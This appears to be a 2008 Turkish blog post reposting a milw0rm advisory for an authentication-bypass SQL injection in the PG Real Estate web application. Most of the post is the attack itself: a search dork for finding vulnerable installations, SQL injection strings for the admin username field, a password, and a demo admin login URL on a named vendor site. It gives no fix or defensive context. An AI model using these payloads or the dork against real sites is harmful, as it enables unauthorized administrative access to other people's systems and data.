"Şeytan İçinde ki Sestir; O Sese Kulak Ver"

-Zorlu BUĞRAHAN-

23 Kasım 2008 Pazar

PG Real Estate (Auth Bypass) SQL Injection Vulnerability

PG Real Estate (Auth Bypass) SQL Injection Vulnerability

link: http://www.milw0rm.com/exploits/7200

Discovered By: ZoRLu

dork: "Powered by PG Real Estate Solution - real estate web site design"

Exploit:

username: [real_admin_name] ' or ' 1=1

password: ZoRLu

note: generally admin name: admin


exploit for demo:

login: http://www.realtysoft.pro/realestate/demo/admin/index.php

username: admin ' or ' 1=1--

password: ZoRLu

0 yorum:

 
Dizi